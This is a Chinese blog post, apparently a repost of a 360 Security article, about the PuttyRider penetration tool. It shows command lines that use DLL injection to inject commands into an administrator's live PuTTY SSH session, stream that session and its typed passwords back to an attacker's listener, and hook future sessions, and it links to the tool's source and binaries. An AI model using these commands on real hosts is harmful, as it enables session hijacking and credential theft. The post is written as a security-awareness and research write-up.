Putty的噩梦——渗透工具PuttyRider使用心得分享

最新推荐文章于 2024-07-24 21:24:56 发布
最新推荐文章于 2024-07-24 21:24:56 发布
阅读量267 收藏
点赞数
分类专栏: ssh 文章标签: shell 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/iteye_6697/article/details/82652199
版权

近日,我们的360监控平台,检测到一个叫PuttyRider渗透工具,小编立马下回来研究,整理一篇工具的使用心得分享给大家。

我们在入侵到一台主机的时候,经常会看到管理员的桌面会放着putty.exe,这说明有很大的可能性管理员是使用putty远程管理主机的。该工具主要是针对SSH客户端putty的利用,采用DLL注入的方式,来实现各种猥琐的利用姿势。我依次演示该工具的三种利用场景

1.当你远程控制对方主机的时候,管理员正好用putty连接着远程主机

这种情景,我们只要直接注入命令到当前的putty进程,就可以利用,非常简单,缺点是没有回显。

t01ce4f3afcf47b04d3.jpg

使用puttyRider.exe –l 查看当前进程中putty正在连接的远程主机信息,这里不光能得到远程主机的IP地址和putty进程号,还能在Injected列看到当前是NO,说明我们还没有进程注入。

t01384d89895aa86a3c.jpg

我们使用puttyrider.exe –p 0 –f –c ifconfig,就把ifconfig命令注入到当前的putty会话了,就达到远程命令执行的目的了。再次puttyRider.exe –l 看一下,发现injected列是yes了,说明我们注入进程成功了。

t01aa1aa8be052a81f8.jpg

2.使用反弹的方式实时看管理员的输入

除了利用第一种方法直接注入命令,我们还可以反弹出来,实时看到对方管理员在putty里的输入,即使管理输入sudo这种命令,我们也能够看到他输入的明文密码。但是这种利用的前提是,对方管理员正在用PUTTY连接的主机可以反弹到你监听的IP地址,防火墙限制的不是很严。

t01a5e3207ba4897591.jpg

Puttyrider.exe –p 0 –r 我监听的IP:端口

执行后,我们就可以看到结果了

t0183fd6fe50fa2129d.jpg

3.我运气不这么好,对方管理员当前没有正在使用PUTTY管理远程主机

这种情况应该最常见了,软件作者也考虑到了,给我们提供了-w参数,他会让puttyrider后台监视新起来的进程,然后反弹到我们的主机,也能实时的看到对方的操作哦,包括输入的账号

http://p2.qhimg.com/t01b10f9dd71aac0fe4.jpg

Puttyrider.exe –w –r 我监听的IP:端口号

当执行完这个命令后,只要管理员下次再次开启PUTTY的时候,我们就能在监听的9999端口看到她的SHELL了

https://i-blog.csdnimg.cn/blog_migrate/251dde9a1d8b4bf20fccf40a3c041ecb.jpeg

最后如果想研究工具细节的童鞋,可以在

https://codeload.github.com/seastorm/PuttyRider/zip/master下载源码,深入学习 :)

编译好的二进制文件可以在

https://github.com/seastorm/PuttyRider/releases/download/0.1/PuttyRider-bin.zip下载

 

 

本文由 360安全播报 原创发布,如需转载请注明来源及本文地址。

iteye_6697
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Ubuntu20.04下PuTTY工具安装及使用
码农17年的博客
03-28 2242
很显然,需要知道自己用的是哪个串口,/dev/ttySn(一般为/dev/ttyS0)表示串行端口终端,接串口线使用的端口设备,/dev/ttyS0一般表示COM1,/dev/ttyS1表示COM2。Putty、TeraTerm、SecureCRT和SSCom等一样,我一般当做串口工具使用,对于有些linux环境,按下空格键就能进入到uboot的linux环境来说,前三个工具可能更加好用,而直接输入USB转串口指令的情况SSCom用起来不错。打开后如下,如果设备会有该端口的输出,则会打印出一些输出信息。
内网渗透总结
qq_55894976的博客
04-01 344
当电脑连入网络时,域控制器首先要鉴别这台电脑是否是属于这个域,用户使用的登录账号是否存在、密码是否正确。生成票据->导入票据->查看凭证 klist->利用 net use 载入->利用本地票据(需管理权限)(类似于web的Cookie欺骗,先将现有的票据删除,防止生成的票据与之冲突,然后生成新的票据导入内存之中)使用WMIC,我们不但可以管理本地计算机,而且还可以管理同一Windows域内的所有远程计算机(需要必要的权限),而被管理的远程计算机不必事先安装WMIC,只需要支持WMI即可。
资深渗透测试工程师的渗透技巧总结(67个Tips)
tzyyyyyy的博客
11-16 1419
本质上是DLL文件,后缀名为cpl,包含一个导出函数CPLApplet(c实现可不指定)执行方法:(1)双击直接运行(2)cmd(3)cmd(4)vbsDim obj(5)js参考:《CPL文件利用介绍》
PuTTY远程登录虚拟机并且获取密钥登录
本人是新手,有一定的了解不到位,望海涵
03-26 4088
利用PuTTy远程登录虚拟机,并且使用密钥认证 1.咱们要先把虚拟机开机,然后查看一下ip地址 2.查看完ip地址后,咱们打开PuTTY,点击Window---Translation查看一下字符集是不是UTF-8, 点击Session再输入虚拟机的ip地址,然后给你的小宝贝虚拟机取个名字,我喜欢用该虚拟机的IP地址来给他命名,点击Save保存, 咱们的虚拟机就保存到里面去了,咱们再选择刚才保存到虚拟机点击Open打开 3.咱们进入的时候,点击Accept接受后,在输入用户名与密码就登录成功了 ...
工具putty下载、安装、使用和常用设置教程
热门推荐
crr411422的博客
06-09 10万+
本章:putty下载、安装、使用和常用设置教程(跟着步骤一步步来即可)
Putty工具使用教程
qq_15089775的博客
12-27 6万+
目录 为啥要用putty 下载安装 使用putty ssh登录 保存session 使用pscp 使用psftp 题外话 为啥要用putty 最重要的原因是免费的,收费的ssh客户端在公司里不让用了。所有我就开始使用一些免费的ssh客户端工具。发现Putty用着还不错,小巧精悍、使用方便,基本上能满足工作需要,主要功能:ssh客户端、pscp、psftp等 下载安装 下载地址:PuTTY: a free SSH and Telnet clien...
Linux入门——使用工具putty远程连接与putty密钥认证连接
Lin9066的博客
05-23 1519
这是我学习Linux的第三篇博客,上一次我给虚拟机配置好了IP,现在开始使用两个常用的远程软件putty跟xshell进行远程连接。 一、远程连接 首先要下载putty,去百度搜索putty,找到官网: 点击进去,选择相应的操作系统与版本,我是64位的Windows,就选择Windows 64-bit: 下载完,直接运行,选择安装路径,我一般不喜欢把这些工具装在C盘,所以我会修改安装路径,安装完之后,可以点击开始找到putty,点击更多,打开文件所在位置,将快捷方式拖到桌面,这样以后打开比较
SSH客户端工具——PuTTY(1)
随遇而安的dandelion的博客
11-13 1万+
本文介绍了SSH客户端工具PuTTY的下载和在Windows下的安装方法、怎么使用PuTTYgen生成SSH密钥对,以及如何通过PuTTY远程登录SSH服务器。
docker部署mysql8.x版本,编写shell脚本自动部署安装mysql
qq_43700885的博客
07-23 280
*1.**先自行安装好docker环境,docker的镜像注册中心最好是国内的,例如执行一下命令直接修改docker配置,这里基本就按照成功了,直接输入docker查看日志命令查看容器启动情况。将下面的命令直接粘贴到文件install-mysql.sh。加载刚修改的配置文件并重新启动docker。**2.**创建mysql自动部署脚本文件。接下来直接执行脚本输入一下命令。出现下图红框标识就表示安装成功。
shell命令-2
m0_73664110的博客
07-21 989
s:套接字还被称为数据接口文件,这种类型的文件通常被用在网络上的数据连接。p:管道文件(FIFO)也是一种特殊的文件类型,他主要的目的解决多个程序同时访问一个文件所造成的错误问题,first-in-first-out。cat xxx.txt:显示文本的内容直接输出在屏幕上(不建议查看内容过多的文件,编辑器只能显示1000行)find . -maxdepth 3 -type f:当前目录开始深度为3层的所有普通文件。find . -name “*.txt”:在当前文件夹下查找以.txt结尾的文件。
MAC安装brew+python+pip
weixin_44435110的博客
07-21 278
要在 macOS 上安装 Homebrew,请按照以下步骤操作
内网隧道——隧道利用方法
qq_55202378的博客
07-23 595
(2)在靶机(192.168.52.138)3389端口和跳板机(192.168.52.143)的6666端口之间搭建一条隧道,就能通过跳板机的8888端口连接内网的3389端口。(2)在kali上连接跳板机8888端口,lcx会将跳板机8888端口的流量转发到靶机(192.168.52.138)3389端口上。工具进行端口转发,在靶机和跳板机中搭建一条隧道,用攻击者电脑连接跳板机隧道端口,通过跳板机的端口,获取到内网靶机的远程桌面权限。注:通过MSF获取到的shell,是经过加密了的。
虚拟环境变量和全局环境变量设置
Ppandaer的博客
07-23 239
/.bashrc和activate脚本各自扮演着不同的角色,它们都在 shell 环境配置中起关键作用,但是它们的职责范围和激活场景有所不同。
linux学习笔记整理: 关于linux:Shell脚本 2024/7/20;
gzx233的博客
07-20 901
Shell脚本的使用
第四节shell条件测试(5)
weixin_73298423的博客
07-21 267
shell的逻辑操作符
反弹shell的方式——之NC反弹shell
最新发布
aihua002的博客
07-24 199
反弹shell是指在攻击机监听某个端口,然后通过目标连接攻击机监听的端口,在攻击机反弹得到目标机的shell。通常在目标网络有防火墙或者其他因素限制,导致无法持续控制目标,或者执行命令受阻等情况时需要进行反弹shell
服务器需要扩容,如何停止宝塔的所有服务?
爱酷码的博客
07-22 317
或者进面板 把以下代码丢到计划任务里的shell脚本执行。2:执行完后扩容好磁盘后重新挂载上去后执行以下两条命令。1:新建一个shell脚本执行以下代码。3:最后别忘了启动宝塔服务哦。
关于三星机玩游戏长时间不操作锁屏的解决办法
weixin_44941809的博客
07-22 391
解决三星屏幕锁问题
putty 工具使用AT命令
06-19
Putty是一个流行的开源终端仿真程序,用于连接基于Unix或Windows系统的远程服务器。在Putty中,你可以使用AT(Automatic Telnet)命令来执行简单的脚本或自动化任务,尤其是在Linux系统中,AT命令常用于计划执行一些定时任务。 以下是使用Putty通过AT命令的基本步骤: 1. **启动Putty**:打开Putty,输入目标服务器的IP地址或主机名,然后点击“Open”。 2. **连接到服务器**:登录后,你会看到一个命令行界面(TTY)。 3. **启用本地AT功能**:在命令行中,键入`atq`检查当前是否有排队的任务,如果没有,输入`at`开始一个新的命令行解释器,这会进入一个模式,让你可以输入AT命令。 4. **编写AT命令**:在AT命令解释器中,你可以像在bash或其他shell中一样输入命令。例如,`at now +10 minutes -f /path/to/your/script.sh` 将在10分钟后执行指定的shell脚本。 5. **保存并执行命令**:完成AT命令后,按回车键提交,然后键入`q`退出AT命令解释器。 6. **查看任务日程**:如果你想查看已经安排的任务,可以使用`at -l`命令,或者在AT命令解释器中输入`atq`查看。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值